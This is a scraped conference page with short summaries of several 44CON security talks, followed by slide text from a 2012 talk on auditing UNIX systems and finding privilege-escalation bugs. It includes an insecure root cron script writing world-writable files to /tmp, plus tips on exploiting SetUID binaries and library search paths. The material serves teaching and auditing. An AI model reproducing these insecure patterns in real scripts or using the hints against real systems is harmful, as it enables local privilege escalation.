The document discusses the UK's Code of Practice for Consumer IoT Security. It provides context on why the code was developed, including to address risks from poorly secured IoT devices. The code outlines 13 security practices for IoT manufacturers, including not using default passwords and keeping software updated. The document also discusses options for regulating adherence to the code and challenges in enforcing security standards.
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...44CON
Cyber Security is often framed in terms of ‘Risk’- the possibility of suffering harm or loss – and the ‘Management’ of Risk to reduce uncertainty. This is familiar territory for businesses. Cyber Security falls in neatly under Risk Management, is assigned a suitable place on the organigramme, tossed some spare budget and granted a few paragraphs in the board report. NIST defines Risk as a ‘function of the likelihood of a given threat-source’s exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organisation’.
Key theme:
This presentation explores the idea that making cyber security analogous to risk is holding us back. How about we talk about security ‘debt’ instead? Technical Debt is already a well understood concept in software development – the cost of additional rework caused by choosing an easy solution now instead of using a better approach that would take longer or cost more. Changing our language changes how we think and how we behave. This presentation argues that such a change could have a significant impact on software security.
In this presentation we will comment on the power of ‘analogies’ and how they’ve shaped our industry. We’ll then consider the difference between the ‘security as risk’ and the ‘security as debt’ paradigms and explore how changing paradigms may change the way we think about, talk about and measure software security. We believe this could have a very empowering effect on development managers and other security professionals who are struggling to articulate the relative benefits of security (or a lack of security) to a software product.
Con speakers fear the Nerf gun. Overrun your talk time at your peril; Steve will shoot your arse with extreme prejudice until you STFU. We had to find a way to pwn the gun and shoot him back.
That’s when we found the Nerf Terrascout: a remote tank gun controlled over 2.4GHz, with a video feed to the remote, complete with crosshairs.
At first, we thought this would be a trivial job: figure out the RF and take control. It turned in to a mammoth hardware, firmware and RF reversing project.
This puppy is so over-specced it would drive you to tears.
The talk will cover the fails, hair loss and eventual success. There won’t be any smart dildos in it, though some of the techniques used are equally suited to teledildonics exploitation, if that’s your thing.
Reversing RF in a high frequency environment using SDRs is challenging. We’ll discuss how we worked around these issues using hardware reversing skills.
We had to import hardware from China for this project, which we could then programme ourselves using SPI, impersonate the legitimate controller and ‘jack the tank gun.
This talk will of course include a live demonstration of hijacking the tank gun and (possibly) shooting Steve.
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...44CON
Presented by: Julien Voisin and Thibault Koechlin
Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON
Saumil Shah presents Stegosploit, a technique for hiding browser exploits in images using steganography. The encoded exploit payload is hidden in the least significant bits of image pixels. When the image is loaded in a browser, the encoded exploit is automatically decoded and triggered without any visual distortion of the image. This allows delivering browser exploits covertly via innocent-looking images. Shah outlines various techniques for encoding exploits in JPEG and PNG images while overcoming lossy compression. The presentation concludes with discussions on the offensive opportunities and defensive challenges of such image-based attacks.
44CON London 2015 - Is there an EFI monster inside your apple?44CON
This document discusses EFI (Extensible Firmware Interface) and potential threats from EFI rootkits. It begins with an introduction to EFI and how it has replaced BIOS. It describes how EFI initializes systems at a low level and provides modular and feature-rich access. It then discusses potential malicious actions such as persisting across operating system reinstalls and bypassing full-disk encryption. It provides examples of real EFI rootkits and vulnerabilities discovered. It discusses tools and techniques for dumping and analyzing EFI contents, including the different regions stored in flash memory. Finally, it outlines the EFI boot process and programming interfaces.
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...44CON
This document discusses detecting and analyzing indicators of compromise from a malware infection. It describes collecting data from firewalls, IDS/IPS, proxies, DNS logs, and system logs to detect suspicious activity. Once a potential malware sample is acquired, static and dynamic analysis techniques are used to analyze its behavior and identify indicators that can be used to detect infected machines, like created files, registry keys, and network traffic. These indicators are expressed using tools like Yara rules and Snort signatures to enable detection of the compromise across an environment.
44CON London 2015 - How to drive a malware analyst crazy44CON
This document discusses techniques that malware authors use to frustrate malware analysts, including inserting breakpoints, manipulating timing functions, exploiting Windows internals, anti-dumping measures, and virtual machine detection. The author then provides recommendations for malware analysts to identify and circumvent these anti-analysis techniques.
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON
This document summarizes a talk on conducting a 15-minute Linux live analysis to determine if a system has been hacked with minimal disturbance. The talk discusses opening a case, collecting key system data like processes and users through scripted network listeners, and analyzing the data to look for signs of compromise. It also covers next steps like dead analysis if evidence of hacking is found. The goal is to quickly identify breaches while preserving evidence through an automated and mostly non-invasive process.
44CON London 2015 - Going AUTH the Rails on a Crazy Train44CON
This document provides an overview of authentication and authorization in Ruby on Rails applications. It discusses how Rails handles authentication and authorization out of the box, as well as common gems used to add these capabilities like Devise and CanCan. It also covers topics like session management, password resets, and potential security issues to consider like the password reset type confusion vulnerability.
44CON London 2015 - Software Defined Networking (SDN) Security44CON
This document provides an overview of software-defined networking (SDN) security. It begins with an introduction to SDN and explains how decoupling the control plane from the data plane creates new attack surfaces. It then discusses recent SDN vulnerabilities in controllers like OpenDaylight and ONOS. Defensive technologies like Topoguard and security-mode ONOS are presented. The document concludes with recommendations for secure SDN development practices and a vision for improving the security of OpenDaylight.
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON
This document discusses strategies for conducting distributed denial-of-service (DDoS) attacks and bypassing common DDoS mitigation tactics. It begins with an introduction to DDoS and then outlines four pillars of amplification attacks: amplification factors, network usage, CPU usage, memory usage, and storage usage. The document then discusses 10 common DDoS mitigation practices and provides recommendations for how to bypass each one through various amplification techniques, protocol abuse, and other attack methods. It concludes by noting that effective DDoS mitigation requires a holistic approach and cannot be solved through any single technology.
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON
This document discusses asynchronous vulnerabilities and callback-oriented hacking techniques. It describes how asynchronous issues are often invisible and outlines solutions using callbacks, such as through DNS requests. It provides examples of payload techniques for issues like SQL injection, command injection, and XSS that call out to an external domain to confirm exploitation. Finally, it notes hazards like friendly fire and ways adversaries may detect the callbacks.
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...44CON
A stack-based buffer overflow vulnerability was discovered in FreeType's CFF rasterizer during fuzz testing. The vulnerability occurs when building the hintmap data structure in the cf2_hintmap_build function. By analyzing the source code, it appears the vulnerability is caused by insufficient bounds checking when accessing the hint mask array via the maskPtr pointer, allowing writes beyond the end of the allocated buffer. This highlights the ongoing need to fuzz test font parsing libraries given the complexity of font formats and opportunity for security issues.
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
The document discusses 5 ways to exploit JTAG (Joint Test Action Group) interfaces to gain unauthorized access or privileges on a system. The 5 techniques are: 1) Accessing non-volatile storage like flash memory via boundary scan, 2) Scraping memory for offline forensic analysis, 3) Patching boot arguments to change how the system boots, 4) Directly patching the kernel by modifying code or function pointers in memory, and 5) Patching a specific process by searching memory for its code and modifying it. While some techniques like memory scraping are slow, others like boot argument patching or kernel patching can be done quickly and provide privileged access. JTAG interfaces provide I/O, execution control, and memory access that enable
2. # whoami_
# Tim Brown
# @timb_machine
# Head Of Research at Portcullis
Computer Security Ltd
# http://www.nthdimension.org.uk/
44con, London, 2012 Tim Brown 2
Portcullis Computer Security Ltd
3. # last_
# >15 years of UNIX experience
# Background in telcos and finance
# 9 years at Portcullis
# More at
http://44con.com/speaker/timbrown/
44con, London, 2012 Tim Brown 3
Portcullis Computer Security Ltd
4. # cat .plan_
# Auditing
# Problems
# Solutions
# Going further
# Why?
# The attack surface
# In the real world
# In the lab
44con, London, 2012 Tim Brown 4
Portcullis Computer Security Ltd
5. # Auditing_
# Problems
# Solutions
44con, London, 2012 Tim Brown 5
Portcullis Computer Security Ltd
6. # Problems_
# Limited access
# Varying OS capabilities
# Multiple solutions
# Differences in requirements
44con, London, 2012 Tim Brown 6
Portcullis Computer Security Ltd
7. # Limited access_
# Client doesn't own the system
# Client doesn't want to give (root)
access
# System is physically unavailable
# System is a black box
44con, London, 2012 Tim Brown 7
Portcullis Computer Security Ltd
8. # Varying OS capabilites
# Standards leave elements undefined
# OS tool chain not sufficient
# * GNU/Linux moves much faster than
commercial OS
# Solaris 10 (much) > Solaris 8
44con, London, 2012 Tim Brown 8
Portcullis Computer Security Ltd
9. # Multiple solutions_
# How do you lock an account?
# passwd l?
# Change the shell?
# Etc...
# If you don't run sendmail, should
the configuration still be
hardened?
44con, London, 2012 Tim Brown 9
Portcullis Computer Security Ltd
10. # Differences in
requirements_
# Which audit methodology do you use?
# Vendors?
# US DoD?
# CIS?
# Etc...
# What if they differ significantly?
# Would you know?
44con, London, 2012 Tim Brown 10
Portcullis Computer Security Ltd
11. # Solutions_
# Better scripts
# Gap analysis
# C(ommon) C(onfiguration)
E(numeration)
# Smarter humans
44con, London, 2012 Tim Brown 11
Portcullis Computer Security Ltd
12. # Gap analysis_
# We probably need to know what
different methodologies check for
# I wish someone else had done it
44con, London, 2012 Tim Brown 12
Portcullis Computer Security Ltd
13. # C(ommon) C(onfiguration)
E(numeration)_
# They have (kinda):
# http://cce.mitre.org/
# Incomplete
# Missing various OS
# Not sure I agree with their
methodology
# No mention of gap analysis (AIX guy
may not know Solaris and vice
versa)
# They consider outcome, not technique
44con, London, 2012 Tim Brown 13
Portcullis Computer Security Ltd
14. # Smarter humans_
# I don't scale well!
# We all need training when it comes
to stuff we don't see every day
# Maybe talks like this will help
DevOps get their shit together?
44con, London, 2012 Tim Brown 14
Portcullis Computer Security Ltd
15. # Going further_
# Why?
# The attack surface
# In the real world
44con, London, 2012 Tim Brown 15
Portcullis Computer Security Ltd
16. # Why?_
# Bug hunting
# More importantly, auditing fails to
answer the hard question – did you
want segregation of roles with
that?
44con, London, 2012 Tim Brown 16
Portcullis Computer Security Ltd
17. # The attack surface_
OS Kernel Services
Enterprise apps Services Batch jobs User roles
DevOps Batch jobs User roles
Users Misfortune Malice
# If “everything is a file”, we need
to get better at analysing the
files...
44con, London, 2012 Tim Brown 17
Portcullis Computer Security Ltd
18. # In the real world_
# The OS should protect us from
ourselves
# Enterprise applications continue
accumulate features
# DevOps will replace us all with
shell scripts
44con, London, 2012 Tim Brown 18
Portcullis Computer Security Ltd
19. # OS flaws_
# Bad standards
# Forks
# Poor defaults
# Incorrectly implemented separation
of privileges
# Poorly implemented administrative
functionality
# Incomplete antiexploitation
mitigations
44con, London, 2012 Tim Brown 19
Portcullis Computer Security Ltd
20. # Examples_
# Shared code such as CDE
# Binaries owned by “bin” user
# Binaries such as telnet and ftp
being SetUID
# WPAR isolation
# Patching may be the problem, not
the solution
44con, London, 2012 Tim Brown 20
Portcullis Computer Security Ltd
21. # Antiexploit mitigations_
Mitigation * GNU/Linux AIX
Mandatory access control Y N (Y in Trusted AIX)
Non-executable stack Y N (select mode by default)
ASLR Y N
Hardened malloc() Y N (Y with Watson malloc())
Stack cookies and other Y (glibc) N
compile time mitigations
mmap() NULL N N
44con, London, 2012 Tim Brown 21
Portcullis Computer Security Ltd
24. # Hardened malloc()_
# Check out David Litchfield's paper
“Heap overflows on AIX 5”
# Also, “Enhancements in AIX 5L
Version 5.3 for application
development” mentions a number of
enhancements / possible areas of
concern
44con, London, 2012 Tim Brown 24
Portcullis Computer Security Ltd
26. # Enterprise “features”_
# Data
# The real value of your system
# “Interesting” code
# More code is always bad, but OS
code at least benefits more from
the “many eyes” principal –
assuming the “many eyes” are
actually looking – your
enterprise app may not
44con, London, 2012 Tim Brown 26
Portcullis Computer Security Ltd
27. # “Interesting” code_
# Backdoors
# Proprietary protocols
# Embedded library copies
# Changes to user environment
# Insecure API usage
# Missing antiexploitation
techniques
# Key material and entropy
# Java :)
44con, London, 2012 Tim Brown 27
Portcullis Computer Security Ltd
28. # Practising unsafe DevOps_
# Build infrastructure
# Cron, cron, cron
# .rhosts
# Sudo :)
# Init and inetd
# User provisioning and access
management
# Key material
# NFS
44con, London, 2012 Tim Brown 28
Portcullis Computer Security Ltd
29. # Cron, cron, cron_
# Your shell script just ran over my
shadow
# grep victim /var/spool/cron/crontabs/*
/var/spool/cron/crontabs/root:0 01 * * * /opt/victim/start.sh
# cat /opt/victim/start.sh
...
umask 000
OUTDIR=/tmp
...
service=/opt/victim/service
...
OUTFILE="${OUTDIR}/${DATE}_${TIME}.log"
...
$service o ${OUTFILE}
44con, London, 2012 Tim Brown 29
Portcullis Computer Security Ltd
30. # In the lab_
# Systems
# Books
# Code
# Tools
# Techniques
44con, London, 2012 Tim Brown 30
Portcullis Computer Security Ltd
31. # Systems_
# Buy or emulate the systems you see
in the wild
# Better still, buy or emulate those
you don't – they're still there!
44con, London, 2012 Tim Brown 31
Portcullis Computer Security Ltd
32. # Books_
# If you understand how one OS works,
the next OS you look at might just
work in a similar way (with similar
bugs / different edge cases):
# Vendor web sites
# Man pages
# Solaris Systems Programming and
Solaris Internals are great books
44con, London, 2012 Tim Brown 32
Portcullis Computer Security Ltd
33. # Code_
# Next time code leaks, take a look,
your adversaries will
# Identify lists like osssecurity,
fewer size contests mean more
signal and less noise
# .jar files are human readable
44con, London, 2012 Tim Brown 33
Portcullis Computer Security Ltd
34. # Tools_
# strings and grep
# truss and strace
# DTrace and SystemTap
# objdump, GDB and IDA
# jad, JDGUI and friends
# Compilers
# checksec.sh (for * GNU/Linux)
# unixprivesccheck
44con, London, 2012 Tim Brown 34
Portcullis Computer Security Ltd
35. # Techniques_
# Sometimes the same crash on another
OS yields greater joy – the Solaris
stack for a certain RPC service
isn't munged
# SetUID binaries can often be
exploited via obscure enviroment
variables – ++ local roots for IBM
products :)
# Old techniques can be reapplied –
glob() style bugs still afflict AIX
44con, London, 2012 Tim Brown 35
Portcullis Computer Security Ltd
36. # Techniques ++_
# Auditing (the other type) will
catch stuff you might miss
# Decompile .jar files
# Check what libraries $enterpriseapp
ships with (don't forget to check
for embedded JVMs)
44con, London, 2012 Tim Brown 36
Portcullis Computer Security Ltd
37. # Techniques ++_
# Check against Microsoft's banned
API list
# Check for antiexploitation
mitigations
# DT_RPATH AKA Import File Strings
44con, London, 2012 Tim Brown 37
Portcullis Computer Security Ltd
38. # DT_RPATH AKA Import File
Strings_
# dump Hv kbbacf1
kbbacf1:
***Loader Section***
Loader Header Information
VERSION# #SYMtableENT #RELOCent LENidSTR
0x00000001 0x0000000f 0x0000001c 0x000000b5
#IMPfilID OFFidSTR LENstrTBL OFFstrTBL
0x00000007 0x000002d8 0x00000063 0x0000038d
***Import File Strings***
INDEX PATH BASE MEMBER
0 /usr/lib:/lib::/opt/IBM/ITM/tmaitm6/links/aix51/lib:.:./lib:../lib::
44con, London, 2012 Tim Brown 38
Portcullis Computer Security Ltd
39. # unixprivesccheck_
# Originally conceived by
@pentestmonkey
# I'm working on 2.x
# Code will be made real soon now!
44con, London, 2012 Tim Brown 39
Portcullis Computer Security Ltd
40. # Conclusions_
# Ask yourself “who analysed the
OS?”; “do I care about segregation
of roles?”; “do I know what my
applications are doing?”; “do I
care what my DevOps teams are
bringing to the party?”
# If these questions matter, don't
audit, whitebox
44con, London, 2012 Tim Brown 40
Portcullis Computer Security Ltd
41. # Questions_
< /dev/audience
44con, London, 2012 Tim Brown 41
Portcullis Computer Security Ltd